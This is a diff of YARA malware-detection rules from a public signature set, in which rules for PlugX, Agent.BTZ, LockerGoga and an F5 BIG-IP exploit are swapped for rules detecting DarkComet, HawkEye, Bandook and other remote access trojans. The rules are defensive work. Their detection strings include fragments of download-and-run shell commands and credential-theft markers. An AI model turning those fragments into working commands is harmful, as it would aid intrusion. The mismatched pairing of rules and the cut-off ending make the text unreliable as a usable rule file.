 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0e65a80c6331a0e8d7df05ac217a8a7fe03b88f1d304f2ff0a26b92ed89153f3"
-		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
-		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
-		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
-		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
-		hash = "654b7c5b667e4d70ebb5fb1807dcd1ee5b453f45424eb59a287d86ad8d0598a1"
-		hash = "ac6a8ec0b92935b7faab05ca21a42ed9eecdc9243fcf1449cc8f050de38e4c4f"
-		logic_hash = "6efc2d7bd6ba1f39554bd6c378e5adb209419c90192fcba0a676b557e5b920b5"
+		logic_hash = "dbccd9885ba0ec5741e3c74908d2e76b15836bc75373c100f344abf9bdf3a0b4"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$op1 = {C7 45 E0 70 71 72 73 C7 45 E4 74 75 76 77 C7 45 E8 78 79 7A 61 C7 45 EC 62 63 64 65 C6 45 F0 00 C7 45 C0 30 31 32 33 C7 45 C4 34 35 36 37 C7 45 C8 38 39 61 62 C7 45 CC 63 64 65 66}
+		$a1 = "CVu3388fnek3W(3ij3fkp0930di"
+		$a2 = "ZINGAWI2"
+		$a3 = "clWebLightGoldenrodYellow"
+		$a4 = "Ancestor for '%s' not found" wide
+		$a5 = "Control-C hit" wide
+		$a6 = {A3 24 25 21}
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and $op1
+		all of them
 }
-rule SIGNATURE_BASE_Plugx_J16_Gen : FILE
+rule SIGNATURE_BASE_RAT_Bandook
 {
 	meta:
-		description = "Detects PlugX Malware samples from June 2016"
-		author = "Florian Roth (Nextron Systems)"
-		id = "13ef1e80-7090-5a1e-bca7-8d3de0dc2247"
-		date = "2016-06-08"
+		description = "Detects Bandook RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "79fb99d8-bd56-5986-9917-e119b51b8303"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "VT Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_win_plugx.yar#L10-L40"
+		reference = "http://malwareconfig.com/stats/bandook"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L95-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e988243663264b2647e098e36b83dd675141fa9765c9bd47c30f29bf176cd8f"
+		logic_hash = "fe658e0990f0d456b1a8f5acea62a3b80bdd4a9bc0eedfe2e1092ea60b4fca2e"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "%WINDIR%\\SYSTEM32\\SERVICES.EXE" fullword wide
-		$x2 = "\\\\.\\PIPE\\RUN_AS_USER(%d)" fullword wide
-		$x3 = "LdrLoadShellcode" fullword ascii
-		$x4 = "Protocol:[%4s], Host: [%s:%d], Proxy: [%d:%s:%d:%s:%s]" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\User Agent\\Post Platform" fullword wide
-		$s2 = "%s\\msiexec.exe %d %d" fullword wide
-		$s3 = "l%s\\sysprep\\CRYPTBASE.DLL" fullword wide
-		$s4 = "%s\\msiexec.exe UAC" fullword wide
-		$s5 = "CRYPTBASE.DLL" fullword wide
-		$s6 = "%ALLUSERSPROFILE%\\SxS" fullword wide
-		$s7 = "%s\\sysprep\\sysprep.exe" fullword wide
-		$s8 = "\\\\.\\pipe\\a%d" fullword wide
-		$s9 = "\\\\.\\pipe\\b%d" fullword wide
-		$s10 = "EName:%s,EAddr:0x%p,ECode:0x%p,EAX:%p,EBX:%p,ECX:%p,EDX:%p,ESI:%p,EDI:%p,EBP:%p,ESP:%p,EIP:%p" fullword ascii
-		$s11 = "Mozilla/4.0 (compatible; MSIE " fullword wide
-		$s12 = "; Windows NT %d.%d" fullword wide
-		$s13 = "SOFTWARE\\Microsoft\\Internet Explorer\\Version Vector" fullword wide
-		$s14 = "\\bug.log" wide
+		$a = "aaaaaa1|"
+		$b = "aaaaaa2|"
+		$c = "aaaaaa3|"
+		$d = "aaaaaa4|"
+		$e = "aaaaaa5|"
+		$f = "%s%d.exe"
+		$g = "astalavista"
+		$h = "givemecache"
+		$i = "%s\\system32\\drivers\\blogs\\*"
+		$j = "bndk13me"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 8 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Plugx_J16_Gen2 : FILE
+rule SIGNATURE_BASE_RAT_Blacknix
 {
 	meta:
-		description = "Detects PlugX Malware Samples from June 2016"
-		author = "Florian Roth (Nextron Systems)"
-		id = "28e9cbb9-cd60-555d-b033-4e2bf293adf2"
-		date = "2016-06-08"
+		description = "Detects BlackNix RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "d7814184-3ae4-53f1-a602-c3fbc02573c3"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "VT Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_win_plugx.yar#L42-L62"
+		reference = "http://malwareconfig.com/stats/BlackNix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L122-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8fbe90cbff5d408d26b0a5ace6833a0e3100d11ff544184d9ccc2f39ee806de9"
+		logic_hash = "de8787fd35e6313c061b8759361698b1acd54b215d226839a8702b1a5d189ccb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "XPlugKeyLogger.cpp" fullword ascii
-		$s2 = "XPlugProcess.cpp" fullword ascii
-		$s4 = "XPlgLoader.cpp" fullword ascii
-		$s5 = "XPlugPortMap.cpp" fullword ascii
-		$s8 = "XPlugShell.cpp" fullword ascii
-		$s11 = "file: %s, line: %d, error: [%d]%s" fullword ascii
-		$s12 = "XInstall.cpp" fullword ascii
-		$s13 = "XPlugTelnet.cpp" fullword ascii
-		$s14 = "XInstallUAC.cpp" fullword ascii
+		$a1 = "SETTINGS" wide
+		$a2 = "Mark Adler"
+		$a3 = "Random-Number-Here"
+		$a4 = "RemoteShell"
+		$a5 = "SystemInfo"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+		all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_ADSLOG_Sep21 : LOG CVE_2021_40539 FILE
+rule SIGNATURE_BASE_RAT_Blackshades : BLACKSHADES
 {
 	meta:
-		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
-		author = "Florian Roth (Nextron Systems)"
-		id = "156317c6-e726-506d-8b07-4f74dae2807f"
-		date = "2021-09-20"
+		description = "Detects BlackShades RAT"
+		author = "Brian Wallace (@botnet_hunter)"
+		id = "039f9efd-034d-5088-9a2f-7a63ad170d3d"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_adselfservice_cve_2021_40539.yar#L2-L14"
+		reference = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L144-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49b7857187c15f48e928747266adca44c227964cef72914616ea269b0e88fe73"
-		score = 70
+		logic_hash = "23f8d52cf92b594f9302d549cf54f37dc0a01b5686da74b72120a8072435abfe"
+		score = 75
 		quality = 85
-		tags = "LOG, CVE-2021-40539, FILE"
+		tags = "BLACKSHADES"
+		family = "blackshades"
 
 	strings:
-		$x1 = "Java traceback errors that include references to NullPointerException in addSmartCardConfig or getSmartCardConfig" ascii wide
+		$string1 = "bss_server"
+		$string2 = "txtChat"
+		$string3 = "UDPFlood"
 
 	condition:
-		filesize < 50MB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_Weblog_Sep21_1 : LOG CVE_2021_40539 FILE
+rule SIGNATURE_BASE_RAT_Bluebanana
 {
 	meta:
-		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
-		author = "Florian Roth (Nextron Systems)"
-		id = "015957a6-8778-5836-af94-6e6d3838f693"
-		date = "2021-09-20"
+		description = "Detects BlueBanana RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f00c7e92-f34c-5666-a1d9-02ac2cf7608c"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_adselfservice_cve_2021_40539.yar#L16-L29"
+		reference = "http://malwareconfig.com/stats/BlueBanana"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L163-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc27afd63d32ac95711e5b4e70764fe0d1bcbb4b4b9b4e3f324e058bba2ef8f6"
-		score = 60
+		logic_hash = "0d84bb63d56d876c8b2e7c8c8afeaba839fee41d2d38f16ac9a13e802008179e"
+		score = 75
 		quality = 85
-		tags = "LOG, CVE-2021-40539, FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "Java"
 
 	strings:
-		$x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide
-		$x2 = "/ServletApi/../RestAPI/Connection" ascii wide
+		$meta = "META-INF"
+		$conf = "config.txt"
+		$a = "a/a/a/a/f.class"
+		$b = "a/a/a/a/l.class"
+		$c = "a/a/a/b/q.class"
+		$d = "a/a/a/b/v.class"
 
 	condition:
-		filesize < 50MB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Fujinama : FILE
+rule SIGNATURE_BASE_RAT_Bozok
 {
 	meta:
-		description = "Fujinama RAT used by Leonardo SpA Insider Threat"
-		author = "ReaQta Threat Intelligence Team"
-		id = "b10b1e45-aa6c-53fa-8e02-7a325c3e12fb"
-		date = "2021-01-07"
+		description = "Detects Bozok RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b1d22e8c-39aa-52e7-9ca8-2b35bb82f7de"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fujinama_rat.yar#L1-L22"
+		reference = "http://malwareconfig.com/stats/Bozok"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L186-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9bff8ee5424a939b5278b2d1b349d898d138b9efb3cf783221826abb4d8015ef"
+		logic_hash = "9a2fcd11573654f0c91c0c0dec8938ca8319a23953a5043135cb0032562f9f53"
 		score = 75
-		quality = 51
-		tags = "FILE"
-		version = "1"
+		quality = 75
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$kaylog_1 = "SELECT" wide ascii nocase
-		$kaylog_2 = "RIGHT" wide ascii nocase
-		$kaylog_3 = "HELP" wide ascii nocase
-		$kaylog_4 = "WINDOWS" wide ascii nocase
-		$computername = "computername" wide ascii nocase
-		$useragent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" wide ascii nocase
-		$pattern = "'()*+,G-./0123456789:" wide ascii nocase
-		$function_1 = "t_save" wide ascii nocase
-		$cftmon = "cftmon" wide ascii nocase
-		$font = "Tahoma" wide ascii nocase
+		$a = "getVer" nocase
+		$b = "StartVNC" nocase
+		$c = "SendCamList" nocase
+		$d = "untPlugin" nocase
+		$e = "gethostbyname" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_1 : FILE
+rule SIGNATURE_BASE_RAT_Clientmesh : TORCT
 {
 	meta:
-		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f8032616-2a54-5107-b330-65fcc84b866e"
-		date = "2017-08-07"
+		description = "Detects ClientMesh RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
+		id = "351df33e-d3a1-5fe8-be38-edb43bc5d38f"
+		date = "2014-01-06"
 		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L13-L27"
+		reference = "http://malwareconfig.com/stats/ClientMesh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L208-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea430b2888b487a5c7a91b73e8a7893b53d67e8ac95ae85fe9d15c633b2ee660"
+		logic_hash = "671da9586110726b1646d4365ccaa87982ec7c86b7d4d80b99dbb444496b936c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
-		hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
+		tags = "TORCT"
+		family = "torct"
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
+		$string1 = "machinedetails"
+		$string2 = "MySettings"
+		$string3 = "sendftppasswords"
+		$string4 = "sendbrowserpasswords"
+		$string5 = "arma2keyMass"
+		$string6 = "keylogger"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them and pe.exports ( "Entry" ) )
+		all of them
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_2 : FILE
+rule SIGNATURE_BASE_RAT_Cybergate
 {
 	meta:
-		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2777443d-6f63-5948-855a-e064a6e0310f"
-		date = "2017-08-07"
+		description = "Detects CyberGate RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "387e7c89-c766-54cf-aac0-3ba03092bc25"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L29-L52"
+		reference = "http://malwareconfig.com/stats/CyberGate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L230-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "41960e6deaee5d087b0eeee515b323cef8ead45ad305d053f6eb1897e204b003"
+		logic_hash = "6b3861ae5e6bd6478e9d8024b0e67a3ac1dbf31083b77477364c55b51d0ed9b5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "73db4295c5b29958c5d93c20be9482c1efffc89fc4e5c8ba59ac9425a4657a88"
-		hash2 = "380b0353ba8cd33da8c5e5b95e3e032e83193019e73c71875b58ec1ed389bdac"
-		hash3 = "f27e9bba6a2635731845b4334b807c0e4f57d3b790cecdc77d8fef50629f51a2"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = { 38 21 38 2C 38 37 38 42 38 4D 38 58 38 63 38 6E
-               38 79 38 84 38 8F 38 9A 38 A5 38 B0 38 BB 38 C6
-               38 D1 38 DC 38 E7 38 F2 38 FD 38 08 39 13 39 1E
-               39 29 39 34 39 3F 39 4A 39 55 39 60 39 6B 39 76
-               39 81 39 8C 39 97 39 A2 39 AD 39 B8 39 C3 39 CE
-               39 D9 39 E4 39 EF 39 FA 39 05 3A 10 3A 1B 3A 26
-               3A 31 3A 3C 3A 47 3A 52 3A 5D 3A 68 3A 73 3A 7E
-               3A 89 3A 94 3A 9F 3A AA 3A B5 3A C0 3A CB 3A D6
-               3A E1 3A EC 3A F7 3A }
-		$s2 = "activeds.dll" ascii fullword
+		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+		$string3 = "EditSvr"
+		$string4 = "TLoader"
+		$string5 = "Stroks"
+		$string6 = "####@####"
+		$res1 = "XX-XX-XX-XX"
+		$res2 = "CG-CG-CG-CG"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.imphash ( ) == "09b7c73fbe5529e6de7137e3e8268b7b"
+		all of ( $string* ) and any of ( $res* )
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Aug17 : FILE
+rule SIGNATURE_BASE_RAT_Darkcomet
 {
 	meta:
-		description = "Detects Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "31804208-3edb-554b-8820-e682db647435"
-		date = "2017-08-07"
+		description = "Detects DarkComet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "e6fd0269-dd0c-58c0-a1a3-24c2aed916ee"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L54-L73"
+		reference = "http://malwareconfig.com/stats/DarkComet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L256-L282"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf4fc7820d516cf0322bf25460301b4d04f914814fc2a069164814dd4e1158be"
+		logic_hash = "db139f754f89affc706e090a41bfcd30cf49f9d4e16ade89993ee170f92cf68b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
-		hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
-		hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "stdole2.tlb" fullword ascii
-		$s2 = "UnInstallW" fullword ascii
+		$a1 = "#BOT#URLUpdate"
+		$a2 = "Command successfully executed!"
+		$a3 = "MUTEXNAME" wide
+		$a4 = "NETDATA" wide
+		$b1 = "FastMM Borland Edition"
+		$b2 = "%s, ClassID: %s"
+		$b3 = "I wasn't able to open the hosts file"
+		$b4 = "#BOT#VisitUrl"
+		$b5 = "#KCMDDC"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them and pe.exports ( "Entry" ) and pe.exports ( "InstallW" ) and pe.exports ( "UnInstallW" ) )
+		all of ( $a* ) or all of ( $b* )
 }
-
-rule SIGNATURE_BASE_APT_Turla_Agent_BTZ_Gen_1 : FILE
+rule SIGNATURE_BASE_RAT_Darkrat
 {
 	meta:
-		description = "Detects Turla Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5e1dd3d-4f03-5f79-898b-e612d2758b60"
-		date = "2018-06-16"
+		description = "Detects DarkRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "8283236a-6ed1-5213-8386-a029867b9677"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L75-L106"
+		reference = "http://malwareconfig.com/stats/DarkRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L284-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8616d95e683f213916f06a7bf672ced90b2fa55cb4331176021614b4f0b03aed"
-		score = 80
+		logic_hash = "dccb473a3cf4478dd1dbf8b35ad564f59740676ecde90266a0dc15cbad89bfe7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
-		$s1 = "release mutex - %u (%u)(%u)" fullword ascii
-		$s2 = "\\system32\\win.com" ascii
-		$s3 = "Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
-		$s4 = "MakeFile Error(%d) copy file to temp file %s" fullword ascii
-		$s5 = "%s%%s08x.tmp" fullword ascii
-		$s6 = "Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
-		$s7 = "Mutex_Log" fullword ascii
-		$s8 = "%s\\system32\\winview.ocx" fullword ascii
-		$s9 = "Microsoft(R) Windows (R) Operating System" fullword wide
-		$s10 = "Error: pos(%d) > CmdSize(%d)" fullword ascii
-		$s11 = "\\win.com" ascii
-		$s12 = "Error(%d) run %s " fullword ascii
-		$s13 = "%02d.%02d.%04d Log begin:" fullword ascii
+		$a = "@1906dark1996coder@"
+		$b = "SHEmptyRecycleBinA"
+		$c = "mciSendStringA"
+		$d = "add_Shutdown"
+		$e = "get_SaveMySettingsOnExit"
+		$f = "get_SpecialDirectories"
+		$g = "Client.My"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "9d0d6daa47d6e6f2d80eb05405944f87" or ( pe.exports ( "Entry" ) and pe.exports ( "InstallM" ) and pe.exports ( "InstallS" ) ) or $x1 or 3 of them ) or ( 5 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Ransom_Lockergoga_Mar19_1 : FILE
+rule SIGNATURE_BASE_RAT_Greame
 {
 	meta:
-		description = "Detects LockerGoga ransomware binaries"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ba5836b9-bc47-54d4-8f7a-475ba0feaac6"
-		date = "2019-03-19"
+		description = "Detects Greame RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b90d3747-407a-5552-971f-78ff78f827a6"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_lockergoga.yar#L2-L26"
+		reference = "http://malwareconfig.com/stats/Greame"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L308-L331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "076d799113f5bf6c00aa29895cca83ff86e89706cf15ca6971a991d345d0ad65"
+		logic_hash = "4a1ce5f5847bdc01d286c1d9cd1e16ba2fd6b5bc56e6094cb1492882708e8e59"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15"
-		hash2 = "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26"
-		hash3 = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "\\.(doc|dot|wbk|docx|dotx|docb|xlm|xlsx|xltx|xlsb|xlw|ppt|pot|pps|pptx|potx|ppsx|sldx|pdf)" wide
-		$x2 = "|[A-Za-z]:\\cl.log" wide
-		$x4 = "\\crypto-locker\\" ascii
-		$xc1 = { 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E
-               00 61 00 6D 00 65 00 00 00 00 00 4D 00 6C 00 63
-               00 72 00 6F 00 73 00 6F 00 66 00 74 }
-		$xc2 = { 00 2E 00 6C 00 6F 00 63 00 6B 00 65 00 64 00 00
-               00 20 46 41 49 4C 45 44 20 00 00 00 00 20 00 00
-               00 20 75 6E 6B 6E 6F 77 6E 20 65 78 63 65 70 74
-               69 6F 6E }
-		$rn1 = "This may lead to the impossibility of recovery of the certain files." wide
+		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+		$b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+		$c = "EditSvr"
+		$d = "TLoader"
+		$e = "Stroks"
+		$f = "Avenger by NhT"
+		$g = "####@####"
+		$h = "GREAME"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) ) or $rn1
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Payload_F5_BIG_IP_Exploitations_Jul20_1 : CVE_2020_5902 FILE
+rule SIGNATURE_BASE_RAT_Hawkeye
 {
 	meta:
-		description = "Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "57705ba1-c0ad-5ca6-8539-44d9da6b5942"
-		date = "2020-06-07"
+		description = "Detects HawkEye RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "22b1d1e6-feea-5f84-9564-326ad80bbd8d"
+		date = "2015-01-06"
 		modified = "2023-12-05"
-		reference = "https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_f5_bigip_expl_payloads.yar#L2-L23"
+		reference = "http://malwareconfig.com/stats/HawkEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L333-L357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3651081bb09452d80cba9f673a7b61c8ee2f47a12fb64d975eb63867688ee3b"
+		logic_hash = "db3a0fe5774f0d137e092a4eb9672a4518d0ef943a1a4619cb646a9ac9f74ee0"
 		score = 75
 		quality = 85
-		tags = "CVE-2020-5902, FILE"
+		tags = ""
+		maltype = "KeyLogger"
+		filetype = "exe"
 
 	strings:
-		$x1 = "rm -f /etc/ld.so.preload" ascii fullword
-		$x2 = "echo \"* * * * * $LDR" ascii
-		$x3 = ".sh -o /tmp/in.sh" ascii
-		$x4 = "chmod a+x /etc/.modules/.tmp" ascii
-		$x5 = "chmod +x /var/log/F5-logcheck"
-		$s1 = "ulimit -n 65535" ascii fullword
-		$s2 = "-s /usr/bin/wget " ascii
-		$s3 = ".sh | sh" ascii
+		$key = "HawkEyeKeylogger" wide
+		$salt = "099u787978786" wide
+		$string1 = "HawkEye_Keylogger" wide
+		$string2 = "holdermail.txt" wide
+		$string3 = "wallet.dat" wide
+		$string4 = "Keylog Records" wide
+		$string5 = "<!-- do not script -->" wide
+		$string6 = "\\pidloc.txt" wide
+		$string7 = "BSPLIT" wide
 
 	condition:
